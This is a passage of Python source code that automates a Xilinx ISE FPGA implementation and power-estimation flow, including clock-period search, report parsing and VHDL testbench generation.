    :return: (1, elapsed) on success, (-1, elapsed) on failure, where
             elapsed is the wall-clock duration formatted as a string.
    """
    attempt = 0
    res_ok = 0          # becomes 1 once the tool ran without 'ERROR:' in its log
    cfile_ok = 1        # becomes 0 when the expected artifact is missing
    timestart = datetime.datetime.now().replace(microsecond=0)
    while(((res_ok==0) or (cfile_ok==0)) and (attempt <= retry_attempts)):
        ilog.write("\n" + datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S') + "\tStarting: " + comment + ", attempt " + str(attempt) +" : {"+ script+"}")
        ilog.flush()
        proc = subprocess.Popen(script, shell=True)
        proc.wait()
        if os.path.exists(res_logfile):
            with open(res_logfile, 'r') as f:
                content = f.read()
        else:
            # The tool produced no log at all: unrecoverable, give up now.
            ilog.write("\n"+ datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')+ "\tResult file not found: "+res_logfile)
            return(-1, str(datetime.datetime.now().replace(microsecond=0) - timestart))
        cfile_ok = 1
        if(check_file != ""):
            if(not os.path.isfile(check_file)):
                ilog.write("\n"+ check_file + " Not found after " + comment)
                cfile_ok = 0
        if((content.find('ERROR:') >= 0) or (cfile_ok == 0)):
            attempt += 1
            ilog.write("\n" + comment +": Error reported, retrying...")
        else:
            res_ok = 1
            cfile_ok = 1
    if(res_ok == 0):
        # FIX: message typo corrected ("Unsuccessfull"); also 'ilog.flush'
        # lacked parentheses, so the buffer was never actually flushed.
        ilog.write("\n"+comment+" Unsuccessful")
        ilog.flush()
        return(-1, str(datetime.datetime.now().replace(microsecond=0) - timestart))
    else:
        ilog.write("\n"+comment + " Finished Successfully")
        return(1, str(datetime.datetime.now().replace(microsecond=0) - timestart))
def implement_configuration(config, target_dir, retry_attempts, overwrite_flag, stat):
    """Run the full ISE implementation flow (xst, ngdbuild, map, par, trce,
    netgen, xpwr) for one configuration inside its own working directory.

    The clock constraint is adjusted iteratively: the period is decreased by
    clk_adjustment_delta until timing fails, then increased until it is met
    again, approximating the minimum achievable period.

    :param config: configuration object holding option sets and genconf
    :param target_dir: parent directory that holds per-configuration folders
    :param retry_attempts: retries per tool invocation on reported errors
    :param overwrite_flag: when False, an existing folder aborts the run
    :param stat: ProcStatus record updated as the flow progresses
    :return: negative status on tool failure; None on success (side effects only)
    """
    print "STARTED : " + config.label
    log = open(os.path.join(config.genconf.tool_log_dir, config.label+".log"), 'w')
    log.write("\n\t\tImplementing: " + config.label+"\n")
    #create directories
    if os.path.exists(config.label):
        if not overwrite_flag: return
        else:
            shutil.rmtree(config.label)
    # fresh working copy of the template project
    shutil.copytree(config.genconf.template_dir, config.label)
    os.chdir(os.path.join(target_dir, config.label))
    print "Process [" + config.label + "], working dir: " + os.getcwd()
    if(not os.path.exists(config.genconf.log_dir)):
        os.makedirs(config.genconf.log_dir)
    #create *.xst file (synthesis options)
    f = open(config.get_xst_file_name(), "w")
    f.write(config.get_xst_file_content())
    f.close()
    #1.1 Synthesis
    stat.update('Progress', 'Synthesis$wait')
    stat.update('Synthesis', 'In progress$wait')
    (status, timetaken) = execute_impl_script(config.get_synthesis_script(), config.synthesis_log, retry_attempts, "SYNTHESIS", log, os.path.join(target_dir, config.label, config.genconf.top_design_unit + ".ngc"))
    if(status < 0):
        stat.update('Synthesis', 'Error$err')
        return(status)
    stat.update('Synthesis', 'Building Post-Synt netlist$wait')
    (status, timetaken) = execute_impl_script(config.get_netgen_script('synthesis'), config.synthesis_netlist_log, retry_attempts, "Building Netlist", log)
    if(status < 0):
        stat.update('Synthesis', 'Error$err')
        return(status)
    #check .ngc file
    stat.update('Synthesis', '100%: ' + timetaken + '$ok')
    #2. Implementation
    iteration = 0
    finish = 0          # set once timing first fails; search direction reverses
    clk_period = config.genconf.clk_initial_period
    #clock adjustment iterations
    inf = 1             # loop exits via break (period found) or return (error)
    log.write("\n\nStarting Implementation")
    stat.update('Converged', 'No$wait')
    while (inf == 1):
        # Regenerate the constraint file with the current trial clock period
        ucf_content = "NET \""+ config.genconf.clk_net +"\" TNM_NET =" + config.genconf.clk_net +"; \nTIMESPEC TS_clock = PERIOD \""+ config.genconf.clk_net +"\" " + str(clk_period) + " ns HIGH 50%;\n" + config.genconf.generic_constraint_content
        log.write("\n\n*.ucf content [Phase = %d, Finish_flag = %d]: \n%s" % (iteration, finish, ucf_content))
        log.flush()
        ucf_file = open(config.genconf.constraint_file,'w')
        ucf_file.write(ucf_content)
        ucf_file.close()
        stat.update('Iteration', str(iteration)+'$ok')
        stat.update('Clock', str(clk_period)+'$ok')
        #2.1 Translate
        stat.update('Progress', 'Translate$wait')
        stat.update('Translate', 'In progress$wait')
        (status, timetaken) = execute_impl_script(config.get_translate_script(), config.translate_log, retry_attempts, "TRANSLATE", log)
        if(status < 0):
            stat.update('Translate', 'Error$err')
            return(status)
        stat.update('Translate', '100%: ' + timetaken + '$ok')
        #2.2 MAP
        stat.update('Progress', 'MAP$wait')
        stat.update('Map', 'In progress$wait')
        (status, timetaken) = execute_impl_script(config.get_map_script(), config.map_log, retry_attempts, "MAP", log)
        if(status < 0):
            stat.update('Map', 'Error$err')
            return(status)
        stat.update('Map', '100%: ' + timetaken + '$ok')
        #2.3 PAR
        stat.update('Progress', 'PlaceRoute$wait')
        stat.update('PlaceRoute', 'In progress$wait')
        (status, timetaken) = execute_impl_script(config.get_par_script(), config.par_log, retry_attempts, "PAR", log)
        if(status < 0):
            stat.update('PlaceRoute', 'Error$err')
            return(status)
        stat.update('PlaceRoute', '100%: ' + timetaken + '$ok')
        #2.4 ANALYZE TIMING
        stat.update('Progress', 'Timing Analysis$wait')
        stat.update('TimingAnalysis', 'In progress$wait')
        (status, timetaken) = execute_impl_script(config.get_trace_script(), config.trace_report, retry_attempts, "TRACE/Timing Analysis", log)
        if(status < 0):
            stat.update('TimingAnalysis', 'Error$err')
            return(status)
        timing_report_file = open(config.trace_report,"r")
        timing_report = timing_report_file.read()
        timing_report_file.close()
        stat.update('TimingAnalysis', '100%: ' + timetaken + '$ok')
        if(timing_report.find("All constraints were met") < 0):
            if(timing_report.find("not met") < 0):
                # Neither verdict present: the report is malformed
                log.write("\nERROR WHILE ANALYZING TIMING REPORT")
                return(-1)
            else: #not met: stop decreasing the clock period, but now increase it until met
                finish = 1
                stat.update('Converged', 'Yes$ok')
                clk_period += config.genconf.clk_adjustment_delta
        else:
            if (finish == 1): #if met after increasing the clock period - minimum period found (stop iterating)
                break
            else: #if met, but minimun period yet not found
                clk_period -= config.genconf.clk_adjustment_delta
        iteration +=1
    # Post-loop: export netlists and run vectorless power estimation
    stat.update('Progress', 'Building Netlist$wait')
    stat.update('NetlistBuilder', 'In process$wait')
    (status, timetaken) = execute_impl_script(config.get_netgen_script('par'), config.par_netlist_log, retry_attempts, "Building Post-PAR Netlist", log)
    if(status < 0): return(status)
    (status, timetaken) = execute_impl_script(config.get_netgen_script('map'), config.map_netlist_log, retry_attempts, "Building Post-MAP Netlist", log)
    if(status < 0): return(status)
    stat.update('NetlistBuilder', '100%: ' + timetaken + '$ok')
    stat.update('Progress', 'Power Analysis$wait')
    stat.update('PowerAnalysis', 'Inprogress$wait')
    (status, timetaken) = execute_impl_script(config.get_es_power_script(), config.es_power_report, retry_attempts, "Power Analysis", log)
    if(status < 0):
        stat.update('PowerAnalysis', 'Error$err')
        return(status)
    stat.update('PowerAnalysis', '100%: ' + timetaken + '$ok')
    stat.update('Progress', 'Completed: ' + datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S') + '$ok')
    log.write("\n\n\t\tImplementation Finished")
    # Publish headline figures to the status record
    impl_prop = get_implementation_properties(config.par_log, config.trace_report, config.es_power_report)
    stat.update('FREQ', str("%.2f" %impl_prop.maximum_frequency) + '$res')
    stat.update('POWER_DYN', str("%.2f" %impl_prop.dynamic_power) + '$res')
    stat.update('SLICE', str(impl_prop.slices) + '$res')
    stat.update('REG', str(impl_prop.ffs) + '$res')
    stat.update('LUT', str(impl_prop.luts) + '$res')
    stat.update('DSP', str(impl_prop.dsps) + '$res')
    stat.update('RAMB', str(impl_prop.rambs) + '$res')
    log.write("\n\n" + impl_prop.to_string())
    log.close()
class ImplementationProperties:
    """Container for the resource, timing and power figures of one run.

    A value of -1 denotes a tag missing from the report file and should be
    shown as '?' in the resulting table.
    """
    def __init__(self):
        # resource utilization counters
        self.luts = 0
        self.ffs = 0
        self.slices = 0
        self.rambs = 0
        self.dsps = 0
        # timing figures
        self.minimum_period = 0.0
        self.maximum_frequency = 0.0
        # power figures
        self.dynamic_power = 0.0
        self.static_power = 0.0
    def to_string(self):
        """Return a tab-separated multi-line summary of all properties."""
        parts = [
            "\t\tImplementation Properties: ",
            "\nLUTs:\t" + str(self.luts),
            "\nFFs:\t" + str(self.ffs),
            "\nSlices:\t" + str(self.slices),
            "\nRAMBs:\t" + str(self.rambs),
            "\nDSPs:\t" + str(self.dsps),
            "\nMin Clk Period:\t" + ("%.3f" % self.minimum_period),
            "\nMax Frequency:\t" + ("%.3f" % self.maximum_frequency),
            "\nDynamic Power:\t" + ("%.3f" % self.dynamic_power),
            "\nStatic Power:\t" + ("%.3f" % self.static_power),
        ]
        return "".join(parts)
def get_implementation_properties(par_file, trace_file, power_file):
    """Parse ISE report files into an ImplementationProperties record.

    :param par_file: PAR log (resource-utilization lines)
    :param trace_file: TRACE timing report (min period / max frequency)
    :param power_file: XPower report ("Supply Power (mW)" summary line)
    Missing files are skipped silently, leaving the zero defaults; an
    incomplete PAR file is reported and parsing stops at that point.
    """
    # FIX: regex patterns are raw strings now; the old "[0-9]+\,?" form relied
    # on the invalid escape '\,' (deprecated, a SyntaxWarning in modern Python).
    num_point_pattern = r"[0-9]+\.?[0-9]*"   # decimal number, e.g. 9.213
    num_comma_pattern = r"[0-9]+,?[0-9]*"    # number with thousands comma, e.g. 1,234
    res = ImplementationProperties()
    #1. Retrieve Power data from power_file
    if(os.path.isfile(power_file)):
        with open(power_file, 'r') as f:
            content = f.read()
        match = re.findall(r"Supply Power \(mW\).+", content)[0]
        power_list = re.findall(num_point_pattern, match)
        # power_list[0] is the total; [1] dynamic, [2] quiescent/static
        res.dynamic_power = float(power_list[1])
        res.static_power = float(power_list[2])
    #2. Retrieve timing data from trace_file
    if(os.path.isfile(trace_file)):
        with open(trace_file, 'r') as f:
            content = f.read()
        match = re.findall(r"Minimum period:.*?\{", content)[0]
        res.minimum_period = float(re.findall(num_point_pattern, match)[0])
        match = re.findall(r"\(Maximum frequency:.*?\)", content)[0]
        res.maximum_frequency = float(re.findall(num_point_pattern, match)[0])
    #3. Retrieve Utilization data from par_file
    if(os.path.isfile(par_file)):
        with open(par_file, 'r') as f:
            content = f.read()
        try:
            match = re.findall(r"Number of Slice LUTs:.*?%", content)[0]
            res.luts = int(re.findall(num_comma_pattern, match)[0].replace(',',''))
            match = re.findall(r"Number of Slice Registers:.*?%", content)[0]
            res.ffs = int(re.findall(num_comma_pattern, match)[0].replace(',',''))
            match = re.findall(r"Number of occupied Slices:.*?%", content)[0]
            res.slices = int(re.findall(num_comma_pattern, match)[0].replace(',',''))
            # RAMB/DSP counts may be split over several primitive types; sum them
            match = re.findall(r"Number of RAMB.*?:(.*?)%", content)
            for c in match:
                res.rambs += int(re.findall(num_comma_pattern, c)[0].replace(',',''))
            match = re.findall(r"Number of DSP.*?:(.*?)%", content)
            for c in match:
                res.dsps += int(re.findall(num_comma_pattern, c)[0].replace(',',''))
        except IndexError:
            # FIX: parenthesized print works under both Python 2 and 3
            print('File Parse Error (file incomplete): get_implementation_properties: ' + par_file)
            return(res)
    return(res)
def get_report_summary(par_report, trace_report, power_report, factorial_design = None, IncludeDefaultConfig=False):
    """Collect per-configuration implementation results into a Table.

    NOTE(review): relies on module-level globals `target_dir` and `genconf`
    (set in the __main__ section) and changes the process cwd while scanning
    -- confirm callers restore the working directory if they need it.

    :param par_report/trace_report/power_report: report file names relative
        to each configuration directory
    :param factorial_design: when given, rows follow its configuration list
        (index 0 = default configuration, skipped unless IncludeDefaultConfig);
        otherwise all directories matching <design_label>* are scanned
    :return: the populated Table
    """
    t = Table("RESULTS")
    t.add_column("CONFIGURATION")
    t.add_column("CLK_PERIOD")
    t.add_column("MAX_FREQUENCY")
    t.add_column("POWER_DYNAMIC")
    t.add_column("POWER_STATIC")
    t.add_column("UTIL_REG")
    t.add_column("UTIL_LUT")
    t.add_column("UTIL_SLICE")
    t.add_column("UTIL_RAMB")
    t.add_column("UTIL_DSP")
    t.add_column("CONFIG_TABLE_INDEX")
    t.add_column("FACTOR_SETTING")
    os.chdir(target_dir)
    dirlist = []
    if factorial_design != None:
        indset = range(0, len(factorial_design.configurations), 1) if IncludeDefaultConfig else range(1, len(factorial_design.configurations), 1)
        for i in indset:
            dirlist.append(factorial_design.configurations[i].label)
    else:
        for c in sorted(glob.glob(genconf.design_label + "*")):
            if(os.path.isdir(c)):
                dirlist.append(c)
    dirlist.sort()
    for i in range(0, len(dirlist), 1):
        #print "\n\nSummarizing Report Data, Configuration directory: " + dirlist[i]
        os.chdir(os.path.join(target_dir, dirlist[i]))
        res = get_implementation_properties(par_report, trace_report, power_report)
        #print res.to_string()
        t.add_row()
        t.put(i, 0, dirlist[i])
        t.put(i, 1, str("%.3f" % res.minimum_period))
        t.put(i, 2, str("%.3f" % res.maximum_frequency))
        t.put(i, 3, str("%.3f" % res.dynamic_power))
        t.put(i, 4, str("%.3f" % res.static_power))
        t.put(i, 5, str(res.ffs))
        t.put(i, 6, str(res.luts))
        t.put(i, 7, str(res.slices))
        t.put(i, 8, str(res.rambs))
        t.put(i, 9, str(res.dsps))
        # Factor metadata is only available when the design object is supplied
        if factorial_design != None:
            c = factorial_design.get_by_label(dirlist[i])
            t.put(i, 10, str(c.table_index))
            t.put(i, 11, str(' '.join(c.factor_setting)))
        else:
            t.put(i, 10, '')
            t.put(i, 11, '')
    return(t)
def norm_clk_period(c):
    """Round a clock period up to the next half-unit boundary.

    Exact integers are returned unchanged; a fractional part in (0, 0.5]
    rounds up to .5, and anything above 0.5 rounds up to the next integer.
    """
    whole = int(c)
    frac = float(c) - float(whole)
    if frac > 0.5:
        return float(whole) + 1.0
    if frac > 0:
        return float(whole) + 0.5
    return float(c)
def simulate_estimate_consumption(config, target_dir, retry_attempts, only_update_testbench, stat):
    """Simulate the post-PAR netlist under a random workload (ISim) and
    estimate dynamic power from the recorded switching activity (XPower).

    Steps: scale the testbench clock constant to the implemented minimum
    period, build an ISim project over the PAR netlists, sanitize escaped
    identifiers in netlist+SDF, compile with fuse, run the simulation
    capturing a SAIF file, then feed it to xpwr. Progress is mirrored into
    `stat`. Returns a negative status on tool failure, None otherwise.
    """
    if(not os.path.exists(config.genconf.tool_log_dir)):
        os.mkdir(config.genconf.tool_log_dir)
    #remove old simulation log (if existed)
    if(os.path.exists(os.path.join(config.genconf.tool_log_dir, config.label+".log"))):
        with open(os.path.join(config.genconf.tool_log_dir, config.label+".log"), 'r+') as f:
            c = f.read()
            ind = c.find("Simulating: " + config.label)
            if ind > 0:
                # truncate everything from the previous simulation section on
                f.seek(0)
                f.write(c[:ind])
                f.truncate()
    log = open(os.path.join(config.genconf.tool_log_dir, config.label+".log"), 'a')
    log.write("\n\t\tSimulating: " + config.label+"\n")
    if not os.path.exists(os.path.join(target_dir, config.label)):
        log.write('\nNo implementation found, nothing to simulate, exiting')
        return
    os.chdir(os.path.join(target_dir, config.label))
    # Minimum period achieved by PAR, taken from the TRACE report
    with open(config.trace_report, 'r') as f:
        content = f.read()
    match = re.findall("Minimum period:.*?\{", content)[0]
    minimum_period = float(re.findall("[0-9]+\.?[0-9]*", match)[0])
    period = norm_clk_period(minimum_period)
    # Simulation times are scaled relative to the reference clock period
    scale_factor = period / config.genconf.std_clock_period
    #1. Modify Testbench: clock period constant
    with open(config.genconf.testbench_file, 'r') as f:
        content = f.read()
    content = re.sub(config.genconf.clk_constant + ".*:=\s*[0-9]+\.?[0-9]*\s*?", config.genconf.clk_constant + " : real := " + str("%.1f" % period), content)
    with open(config.genconf.testbench_file, 'w') as f:
        f.write(content)
    print('Testbench Updated: ' + config.label)
    if(only_update_testbench):
        return
    #2. Create/Modify sim_project_file
    content = ""
    if(config.genconf.sim_project_file != ""):
        f = open(config.genconf.sim_project_file, 'r')
        content = f.read()
        f.close()
    sim_prj_file = "par_sim.prj"
    netlist_files = glob.glob(config.genconf.netlist_dir + "/par/" + "*.vhd")
    # netlist_files = glob.glob(config.genconf.netlist_dir + "/par/" + "*.v")
    for c in netlist_files:
        # netlists are prepended so they compile before the testbench
        content = "vhdl work \"" + c + "\"\n" + content
        # content = "verilog work \"" + c + "\"\n" + content
    content += "vhdl work \"" + config.genconf.testbench_file + "\"\n"
    # content += "verilog work \"" + config.genconf.testbench_file + "\"\n"
    f = open(sim_prj_file, 'w')
    f.write(content)
    f.close()
    #3. Check netlist for invalid identifiers, rename them
    rx_ptn = re.compile(r"\\.*\)\\")        # escaped identifiers like \foo(3)\
    repl_ptn = re.compile("[a-zA-Z0-9_]+")
    for c in netlist_files:
        ndesc = open(c,'r')
        ncontent = ndesc.read()
        ndesc.close()
        sdf = c.replace(".vhd", ".sdf")
        # sdf = c.replace(".v", ".sdf")
        if(os.path.exists(sdf)):
            sdf_desc = open(sdf,'r')
            sdf_content = sdf_desc.read()
            sdf_desc.close()
        # NOTE(review): if the .sdf is absent but escaped identifiers exist,
        # sdf_content below is undefined (pre-existing behavior).
        nlines = ncontent.split('\n')
        log.write("Netlist file " + c + ", lines: " + str(len(nlines)))
        ident_list = set()
        for l in nlines:
            match = re.findall(rx_ptn, l)
            if(len(match)>0):
                ident_list.add(match[0])
        cnt = 0
        for ident in ident_list:
            # derive a plain, tool-safe replacement name
            tx = re.findall(repl_ptn, ident)
            if(len(tx) > 0):
                repl_id = tx[0] + "_FixSyntax_" + str(cnt)
            else:
                repl_id = "Identifier_FixSyntax_" + str(cnt)
            ncontent = ncontent.replace(ident, repl_id)
            # the SDF file spells the same identifier slightly differently
            x = ident.replace("\\","",1).replace(")\\","\\)")
            sdf_content = sdf_content.replace(x, repl_id)
            log.write("\n\t\tFixed Identifier Syntax: " + ident + " -> " + repl_id + " [" + x + "] -> " + repl_id)
            cnt += 1
        if(cnt > 0):
            log.write("\n\t\tREWRITING NETLIST: " + c)
            ndesc = open(c,'w')
            ncontent = ndesc.write(ncontent)  # NOTE(review): write() result assigned; harmless
            ndesc.close()
            if(os.path.exists(sdf)):
                log.write("\n\t\tREWRITING SDF: " + sdf)
                sdf_desc = open(sdf,'w')
                sdf_desc.write(sdf_content)
                sdf_desc.close()
    #4. Compile: fuse... [subprocess]
    stat.update('Progress', 'Fuse Compile$wait')
    stat.update('Fuse_Compile', 'In progress$wait')
    print "Fuse Compiling: " + config.label
    sim_exec = "testbench_isim_par.exe"
    fuse_script = "fuse -intstyle ise -mt off -incremental -lib simprims_ver -lib unisims_ver -lib unimacro_ver -lib xilinxcorelib_ver -lib secureip -o ./" + sim_exec + " -prj ./" + sim_prj_file + " work." + config.genconf.testbench_top_unit + " > " + config.fuse_log
    # fuse_script = "fuse -intstyle ise -mt off -incremental -lib simprims_ver -lib unisims_ver -lib unimacro_ver -lib xilinxcorelib_ver -lib secureip -o ./" + sim_exec + " -prj ./" + sim_prj_file + " work." + config.genconf.testbench_top_unit + " work.glbl > " + config.fuse_log
    (status, timetaken) = execute_impl_script(fuse_script, config.fuse_log , retry_attempts, "FUSE compile", log, sim_exec)
    if(status < 0):
        stat.update('Fuse_Compile', 'Error$err')
        return(status)
    stat.update('Fuse_Compile', '100%: ' + timetaken + '$ok')
    #5. Create *.cmd file
    saif_file = "xpower_isim.saif"
    cmd_content = "sdfanno -min " + config.genconf.netlist_dir + "/par/_timesim.sdf" + " -root /" + config.genconf.testbench_top_unit + "/" + config.genconf.uut_root
    cmd_content += "\nonerror {resume}"
    cmd_content += "\nrun 0 ns"
    cmd_content += "\nrestart"
    # settle time before switching-activity capture starts
    cmd_content += "\nrun " + str(int(scale_factor * config.genconf.std_start_time)) + " ns"
    cmd_content += "\nsaif open -scope /" + config.genconf.testbench_top_unit + "/" + config.genconf.uut_root + " -file " + saif_file + " -allnets"
    cmd_content += "\nrun " + str(int(scale_factor * config.genconf.std_observation_time)) + " ns"
    cmd_content += "\nsaif close;\nexit\n"
    batch_file = "isim_workload.cmd"
    with open(batch_file, "w") as f:
        f.write(cmd_content)
    #6. Simulate *.exe... *.cmd... [subprocess]
    stat.update('Progress', 'Simulation$wait')
    stat.update('Simulation_ISIM', 'In progress$wait')
    # NOTE(review): `platform` is presumably sys.platform imported at module
    # level -- confirm ('win64' is never a CPython sys.platform value).
    if platform == 'win32' or platform == 'win64':
        isim_script = os.path.join(config.genconf.ise_path, 'settings64.bat') + ' && ' + sim_exec + " -intstyle " + config.genconf.intstyle
    else:
        isim_script = "./"+sim_exec+" -intstyle " + config.genconf.intstyle
    if(config.genconf.isim_gui == "on"):
        isim_script += " -gui"
    if(config.genconf.waveform_file != ""):
        isim_script += " -view " + config.genconf.waveform_file
    isim_script += " -tclbatch ./" + batch_file
    isim_script += " -wdb ./testbench_isim_par.wdb"
    isim_script += " > " + config.isim_log
    (status, timetaken) = execute_impl_script(isim_script, config.isim_log, retry_attempts, "Simulation swithing activity", log, saif_file)
    if(status < 0):
        stat.update('Simulation_ISIM', 'Error$err')
        return(status)
    stat.update('Simulation_ISIM', '100%: ' + timetaken + '$ok')
    #7. Xpower [subprocess]
    stat.update('Progress', 'Power Analysis$wait')
    stat.update('PowerAnalysis', 'In progress$wait')
    #config.saif_power_report = config.genconf.log_dir + "/SAIF_" + config.genconf.top_design_unit + ".pwr"
    xpower_script = "xpwr -v -intstyle " + config.genconf.intstyle + " -ol std " + config.genconf.top_design_unit + ".ncd " + config.genconf.top_design_unit + ".pcf" + " -s " + saif_file +" -o " + config.saif_power_report
    xpower_script += " > " + config.genconf.log_dir + "/xpower_log.log"
    (status, timetaken) = execute_impl_script(xpower_script, config.saif_power_report, retry_attempts, "Xpower Power Estimation (+ SAIF)", log)
    # remove the bulky isim working folder regardless of xpwr outcome
    if(os.path.exists(os.path.join(target_dir, config.label, './isim'))):
        print config.label + ' cleanup: Removing isim folder'
        shutil.rmtree(os.path.join(target_dir, config.label, './isim'))
    if(status < 0):
        stat.update('PowerAnalysis', 'Error$err')
        return(status)
    stat.update('PowerAnalysis', '100%: ' + timetaken + '$ok')
    stat.update('Progress', 'Completed: ' + datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S') + '$ok')
    # Publish headline figures to the status record
    impl_prop = get_implementation_properties(config.par_log, config.trace_report, config.saif_power_report)
    stat.update('FREQ', str("%.2f" %impl_prop.maximum_frequency) + '$res')
    stat.update('POWER_DYN', str("%.2f" %impl_prop.dynamic_power) + '$res')
    stat.update('SLICE', str(impl_prop.slices) + '$res')
    stat.update('REG', str(impl_prop.ffs) + '$res')
    stat.update('LUT', str(impl_prop.luts) + '$res')
    stat.update('DSP', str(impl_prop.dsps) + '$res')
    stat.update('RAMB', str(impl_prop.rambs) + '$res')
    log.write("\n\n" + impl_prop.to_string())
    log.close()
#----------------------------------------------
class SignalDim:
    """One dimension of a VHDL signal/port range, e.g. "7 downto 0"."""
    def __init__(self, LeftD=int(0), RightD=int(0), Dir='downto'):
        self.LeftD = LeftD      # left bound (str or int, as parsed)
        self.RightD = RightD    # right bound
        self.Dir = Dir          # 'downto' (descending) or 'to' (ascending)
    def to_string(self):
        """Return the range in VHDL syntax: "<left> <dir> <right>"."""
        return(str(self.LeftD) + " " + self.Dir + " " + str(self.RightD))
    def get_width(self):
        """Number of elements covered by the range, regardless of direction.

        FIX: was abs(L - R + 1), which under-counts ascending ('to') ranges
        by two (e.g. "0 to 7" yielded 6 instead of 8); the +1 belongs
        outside the abs().
        """
        return(abs(int(self.LeftD) - int(self.RightD)) + 1)
    def get_max(self):
        """Return the larger of the two bounds as int."""
        if(int(self.LeftD) > int(self.RightD)):
            return(int(self.LeftD))
        else:
            return(int(self.RightD))
    def get_min(self):
        """Return the smaller of the two bounds as int."""
        if(int(self.LeftD) < int(self.RightD)):
            return(int(self.LeftD))
        else:
            return(int(self.RightD))
class PortT:
    """A single entity port parsed from a VHDL netlist."""
    def __init__(self, name='', direction='', basetype=''):
        self.name = name
        self.wire = None          # testbench signal name, set by get_wire_definition
        self.direction = direction
        self.basetype = basetype
        self.dimensions = []      # SignalDim-like objects, outermost first
        self.used = 0
    def _dims_suffix(self):
        # " (d1, d2, ..., dn)" fragment; only called when dimensions exist.
        # Identity comparison against the last element mirrors the original
        # terminator logic.
        text = " ("
        last = self.dimensions[-1]
        for d in self.dimensions:
            if d is last:
                text += d.to_string() + ")"
            else:
                text += d.to_string() + ", "
        return text
    def to_string(self):
        """Return "<name> <direction> <basetype>[ (dims)]"."""
        desc = self.name + " " + self.direction + " " + self.basetype
        if self.dimensions:
            desc += self._dims_suffix()
        return desc
    def get_wire_definition(self, prefix="tb_"):
        """Bind self.wire = prefix+name and return its VHDL signal declaration."""
        self.wire = prefix + self.name
        decl = 'signal ' + self.wire + ' : ' + self.basetype
        if self.dimensions:
            decl += self._dims_suffix()
        return decl
    def get_width(self):
        """Total element count: product of all dimension widths (1 for scalars)."""
        total = 1
        for d in self.dimensions:
            total *= d.get_width()
        return total
class EntityT:
    """Parsed VHDL entity: the raw file text plus its extracted port list."""
    def __init__(self, name='none', file_content=''):
        self.name = name
        self.file_content = file_content
        self.arch_name = ''
        self.port_list_def = []      # raw "name : dir type;" fragments
        self.entity_definition = ''  # full "entity ... end" text
        self.port_list = []          # PortT objects
        self.architecture = ''
        self.body = ''
        self.port_map = []
        self.expressions = []
    def get_port_by_name(self, portname, match_case="off"):
        """Find a port by name, case-insensitively unless match_case != 'off'.

        Returns the first matching port object, or None when absent.
        """
        if match_case == "off":
            wanted = portname.lower()
            for port in self.port_list:
                if port.name.lower() == wanted:
                    return port
        else:
            for port in self.port_list:
                if port.name == portname:
                    return port
        return None
def build_testbench(config, target_dir, testbench_template_content):
    """Generate a VHDL testbench for the post-PAR netlist from a template.

    Parses the entity declaration of the top design unit out of the PAR
    netlist, then substitutes the template placeholders --#Signals,
    --#Instance, --#Clock, --#Reset, --#Random_vector and --#Process with
    generated code driving every data input from a random vector each clock
    cycle.  The result is written to genconf.testbench_file.
    """
    result = testbench_template_content
    # Regexes for picking apart the entity port declaration
    pure_port_name = "[a-zA-Z0-9_.]+"
    port_par_pattern = re.compile(pure_port_name)
    port_def_pattern = re.compile(pure_port_name+'.+?;')
    dimensions_def_pattern=re.compile("\(.+?\)")
    number_pattern = re.compile("[0-9]+")
    word_pattern = re.compile("[a-zA-Z]+")
    os.chdir(os.path.join(target_dir, config.label))
    print("\n Target dir: " + os.getcwd())
    # Locate the netlist file that declares the top entity
    netlist_files = glob.glob(config.genconf.netlist_dir + "/par/" + "*.vhd")
    ent = None
    for ntf in netlist_files:
        f = open(ntf)
        content = f.read()
        f.close()
        match = re.findall("entity\s+"+ config.genconf.top_design_unit +"\s+is",content,re.DOTALL)
        if(len(match)>0):
            ent = EntityT(config.genconf.top_design_unit, content)
            break
    # NOTE(review): if no netlist declares the entity, ent stays None and the
    # next line raises AttributeError (pre-existing behavior).
    match = re.findall('entity\s+'+ent.name+'\s+is.+?end\s'+ent.name,content,re.DOTALL)
    ent.entity_definition = match[0]
    # Normalize the closing ");" so every port declaration ends with ';'
    t = re.sub('\s*\)\s*;\s*end', ';\nend', ent.entity_definition)
    ent.port_list_def = port_def_pattern.findall(t)
    #parse port list -> list of PortT objects
    for p in ent.port_list_def:
        t = port_par_pattern.findall(p)
        port = PortT(t[0],t[1],t[2])  # tokens: name, direction, base type
        dim = dimensions_def_pattern.findall(p)
        if len(dim) > 0:
            m=dim[0].split(',')
            for x in m:
                nm = number_pattern.findall(x)
                wd = word_pattern.findall(x)
                sdim = SignalDim(nm[0], nm[1], wd[0])
                port.dimensions.append(sdim)
        ent.port_list.append(port)
    #Signal definitions to use in port map
    sdef = ""
    for p in ent.port_list:
        sdef += "\n\t" + p.get_wire_definition()
        # Scalar inputs get an initial value; the reset net starts asserted.
        assignment = ''
        if(p.direction =="in" and len(p.dimensions) == 0):
            assignment = " := \'0\'"
            if(p.name.lower() == config.genconf.rst_net.lower()):
                assignment = " := \'1\'"
        sdef += assignment + ";"
    result = result.replace('--#Signals', sdef)
    #UUT Instance port map
    uut_map = config.genconf.uut_root + " : entity work." + config.genconf.top_design_unit + " port map ("
    for i in range(0, len(ent.port_list), 1):
        uut_map += "\n\t" + ent.port_list[i].name + "\t=>\t" + ent.port_list[i].wire
        if(i != len(ent.port_list)-1):
            uut_map += ","
    uut_map +="\n\t);"
    result = result.replace('--#Instance', uut_map)
    #Clock
    clock_port = ent.get_port_by_name(config.genconf.clk_net)
    if(clock_port == None):
        print "clock signal [" + config.genconf.clk_net +"] not found in the netlist code"
    else:
        clk_proc = "\t\twait for 1 ns * " + config.genconf.clk_constant + "/2;\n\t\t" + clock_port.wire + " <= not " + clock_port.wire + ";"
        result = result.replace('--#Clock', clk_proc)
    #Reset
    reset_port = ent.get_port_by_name(config.genconf.rst_net)
    if(reset_port == None):
        print "Reset signal [" + config.genconf.rst_net +"] not found in the netlist code"
    else:
        # Deassert reset after 10 clock periods
        rst_proc = "\t\twait for 10*" + config.genconf.clk_constant + ";\n\t\t" + reset_port.wire + " <= \'0\';"
        result = result.replace('--#Reset', rst_proc)
    #Random_vector
    inputs = []     # data inputs (all 'in' ports except clock and reset)
    in_wid = 0      # total stimulus vector width
    for p in ent.port_list:
        if(p.direction == "in" and p.name.lower() != config.genconf.clk_net.lower() and p.name.lower() != config.genconf.rst_net.lower()):
            inputs.append(p)
            in_wid += p.get_width()
    if(in_wid < 16): in_wid = 16;
    vect = 'rand_input_vect'
